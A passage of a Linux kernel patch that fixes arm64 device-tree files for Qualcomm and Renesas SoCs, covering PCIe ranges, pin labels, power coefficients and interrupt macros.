+ 		hid-descr-addr = <0x0001>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index b16886f715179..6f0ee4e13ef1d 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -1521,7 +1521,7 @@
+ 				};
+ 			};
+ 
+-			qspi_data12: qspi-data12 {
++			qspi_data23: qspi-data23 {
+ 				pinmux-data {
+ 					pins = "gpio66", "gpio67";
+ 					function = "qspi_data";
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi b/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
+index 4566722bf4ddf..8f5d82885e447 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
+@@ -33,7 +33,7 @@ ap_tp_i2c: &i2c0 {
+ 		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
+ 
+ 		hid-descr-addr = <0x20>;
+-		vcc-supply = <&pp3300_z1>;
++		vdd-supply = <&pp3300_z1>;
+ 
+ 		wakeup-source;
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 346da6af51ac9..0cdc579f26de7 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -2023,7 +2023,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+@@ -3590,12 +3590,17 @@
+ 			      <0 0x88e2000 0 0x1000>;
+ 			interrupts-extended = <&pdc 11 IRQ_TYPE_LEVEL_HIGH>;
+ 			ports {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
+ 				port@0 {
++					reg = <0>;
+ 					eud_ep: endpoint {
+ 						remote-endpoint = <&usb2_role_switch>;
+ 					};
+ 				};
+ 				port@1 {
++					reg = <1>;
+ 					eud_con: endpoint {
+ 						remote-endpoint = <&con_eud>;
+ 					};
+@@ -3606,7 +3611,11 @@
+ 		eud_typec: connector {
+ 			compatible = "usb-c-connector";
+ 			ports {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
+ 				port@0 {
++					reg = <0>;
+ 					con_eud: endpoint {
+ 						remote-endpoint = <&eud_con>;
+ 					};
+@@ -4336,7 +4345,7 @@
+ 				function = "qspi_data";
+ 			};
+ 
+-			qspi_data12: qspi-data12-pins {
++			qspi_data23: qspi-data23-pins {
+ 				pins = "gpio16", "gpio17";
+ 				function = "qspi_data";
+ 			};
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index d761da47220dd..a99eda4971010 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -198,7 +198,7 @@
+ 			reg = <0x0 0x0>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -222,7 +222,7 @@
+ 			reg = <0x0 0x100>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -243,7 +243,7 @@
+ 			reg = <0x0 0x200>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -264,7 +264,7 @@
+ 			reg = <0x0 0x300>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -2226,8 +2226,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0xd00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0xd00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -2331,7 +2331,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_EDGE_RISING>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index 47e09d96f6098..78ae4b9eaa106 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1783,8 +1783,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1879,7 +1879,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_EDGE_RISING>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index 29e352a577311..e93955525a107 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -1808,8 +1808,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 142 IRQ_TYPE_LEVEL_HIGH>,
+@@ -1917,7 +1917,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+@@ -2025,7 +2025,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x64200000 0x0 0x64200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x64200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x64300000 0x0 0x64300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 243 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts b/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
+index 9c4cfd995ff29..e87514d8fd84e 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
++++ b/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
+@@ -341,6 +341,9 @@
+ 
+ &usb_1 {
+ 	status = "okay";
++};
++
++&usb_1_dwc3 {
+ 	dr_mode = "peripheral";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index 4714d7bf03b9f..128542582b3d8 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -1722,8 +1722,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1831,8 +1831,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0 0x40200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x40300000 0 0x40300000 0x0 0x1fd00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1879,8 +1879,8 @@
+ 			phys = <&pcie1_lane>;
+ 			phy-names = "pciephy";
+ 
+-			perst-gpio = <&tlmm 97 GPIO_ACTIVE_LOW>;
+-			enable-gpio = <&tlmm 99 GPIO_ACTIVE_HIGH>;
++			perst-gpios = <&tlmm 97 GPIO_ACTIVE_LOW>;
++			wake-gpios = <&tlmm 99 GPIO_ACTIVE_HIGH>;
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie1_default_state>;
+diff --git a/arch/arm64/boot/dts/renesas/r8a774c0.dtsi b/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
+index 151e32ac03683..ec7c7851519f4 100644
+--- a/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
+@@ -49,17 +49,14 @@
+ 		opp-shared;
+ 		opp-800000000 {
+ 			opp-hz = /bits/ 64 <800000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1200000000 {
+ 			opp-hz = /bits/ 64 <1200000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 			opp-suspend;
+ 		};
+diff --git a/arch/arm64/boot/dts/renesas/r8a77990.dtsi b/arch/arm64/boot/dts/renesas/r8a77990.dtsi
+index 3053b4b214978..3ed31ffd73a28 100644
+--- a/arch/arm64/boot/dts/renesas/r8a77990.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a77990.dtsi
+@@ -49,17 +49,14 @@
+ 		opp-shared;
+ 		opp-800000000 {
+ 			opp-hz = /bits/ 64 <800000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1200000000 {
+ 			opp-hz = /bits/ 64 <1200000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 			opp-suspend;
+ 		};
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+index 689aa4ba416b8..a4738842f0646 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+@@ -5,7 +5,6 @@
+  * Copyright (C) 2022 Renesas Electronics Corp.
+  */
+ 
+-#include <dt-bindings/interrupt-controller/arm-gic.h>
+ #include <dt-bindings/clock/r9a07g043-cpg.h>
+ 
+ / {
+@@ -107,11 +106,10 @@
+ 			compatible = "renesas,r9a07g043-ssi",
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x10049c00 0 0x400>;
+-			interrupts = <GIC_SPI 326 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 327 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 329 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupts = <SOC_PERIPHERAL_IRQ(326) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(327) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(328) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -128,11 +126,10 @@
+ 			compatible = "renesas,r9a07g043-ssi",
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a000 0 0x400>;
+-			interrupts = <GIC_SPI 330 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 331 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 333 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupts = <SOC_PERIPHERAL_IRQ(330) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(331) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(332) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -149,11 +146,9 @@
+ 			compatible = "renesas,r9a07g043-ssi",
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+-			interrupts = <GIC_SPI 334 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 335 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 336 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 337 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupts = <SOC_PERIPHERAL_IRQ(334) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(337) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -170,11 +165,10 @@
+ 			compatible = "renesas,r9a07g043-ssi",
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a800 0 0x400>;
+-			interrupts = <GIC_SPI 338 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 339 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 341 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupts = <SOC_PERIPHERAL_IRQ(338) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(339) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(340) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -190,9 +184,9 @@
+ 		spi0: spi@1004ac00 {
+ 			compatible = "renesas,r9a07g043-rspi", "renesas,rspi-rz";
+ 			reg = <0 0x1004ac00 0 0x400>;
+-			interrupts = <GIC_SPI 415 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 413 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 414 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(415) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(413) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(414) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "error", "rx", "tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_RSPI0_CLKB>;
+ 			resets = <&cpg R9A07G043_RSPI0_RST>;
+@@ -208,9 +202,9 @@
+ 		spi1: spi@1004b000 {
+ 			compatible = "renesas,r9a07g043-rspi", "renesas,rspi-rz";
+ 			reg = <0 0x1004b000 0 0x400>;
+-			interrupts = <GIC_SPI 418 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 416 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 417 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(418) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(416) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(417) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "error", "rx", "tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_RSPI1_CLKB>;
+ 			resets = <&cpg R9A07G043_RSPI1_RST>;
+@@ -226,9 +220,9 @@
+ 		spi2: spi@1004b400 {
+ 			compatible = "renesas,r9a07g043-rspi", "renesas,rspi-rz";
+ 			reg = <0 0x1004b400 0 0x400>;
+-			interrupts = <GIC_SPI 421 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 419 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 420 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(421) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(419) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(420) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "error", "rx", "tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_RSPI2_CLKB>;
+ 			resets = <&cpg R9A07G043_RSPI2_RST>;
+@@ -245,12 +239,12 @@
+ 			compatible = "renesas,scif-r9a07g043",
+ 				     "renesas,scif-r9a07g044";
+ 			reg = <0 0x1004b800 0 0x400>;
+-			interrupts = <GIC_SPI 380 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 382 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 383 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 381 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 384 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 384 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(380) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(382) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(383) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(381) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(384) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(384) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi",
+ 					  "bri", "dri", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCIF0_CLK_PCK>;
+@@ -264,12 +258,12 @@
+ 			compatible = "renesas,scif-r9a07g043",
+ 				     "renesas,scif-r9a07g044";
+ 			reg = <0 0x1004bc00 0 0x400>;
+-			interrupts = <GIC_SPI 385 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 387 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 388 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 386 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 389 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 389 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(385) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(387) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(388) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(386) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(389) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(389) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi",
+ 					  "bri", "dri", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCIF1_CLK_PCK>;
+@@ -283,12 +277,12 @@
+ 			compatible = "renesas,scif-r9a07g043",
+ 				     "renesas,scif-r9a07g044";
+ 			reg = <0 0x1004c000 0 0x400>;
+-			interrupts = <GIC_SPI 390 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 392 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 393 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 391 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 394 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 394 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(390) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(392) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(393) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(391) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(394) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(394) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi",
+ 					  "bri", "dri", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCIF2_CLK_PCK>;
+@@ -302,12 +296,12 @@
+ 			compatible = "renesas,scif-r9a07g043",
+ 				     "renesas,scif-r9a07g044";
+ 			reg = <0 0x1004c400 0 0x400>;
+-			interrupts = <GIC_SPI 395 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 397 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 398 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 396 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 399 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 399 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(395) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(397) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(398) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(396) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(399) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(399) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi",
+ 					  "bri", "dri", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCIF3_CLK_PCK>;
+@@ -321,12 +315,12 @@
+ 			compatible = "renesas,scif-r9a07g043",
+ 				     "renesas,scif-r9a07g044";
+ 			reg = <0 0x1004c800 0 0x400>;
+-			interrupts = <GIC_SPI 400 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 402 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 403 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 401 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 404 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 404 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(400) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(402) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(403) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(401) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(404) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(404) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi",
+ 					  "bri", "dri", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCIF4_CLK_PCK>;
+@@ -339,10 +333,10 @@
+ 		sci0: serial@1004d000 {
+ 			compatible = "renesas,r9a07g043-sci", "renesas,sci";
+ 			reg = <0 0x1004d000 0 0x400>;
+-			interrupts = <GIC_SPI 405 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 406 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 407 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 408 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(405) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(406) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(407) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(408) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCI0_CLKP>;
+ 			clock-names = "fck";
+@@ -354,10 +348,10 @@
+ 		sci1: serial@1004d400 {
+ 			compatible = "renesas,r9a07g043-sci", "renesas,sci";
+ 			reg = <0 0x1004d400 0 0x400>;
+-			interrupts = <GIC_SPI 409 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 410 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 411 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 412 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(409) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(410) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(411) IRQ_TYPE_EDGE_RISING>,
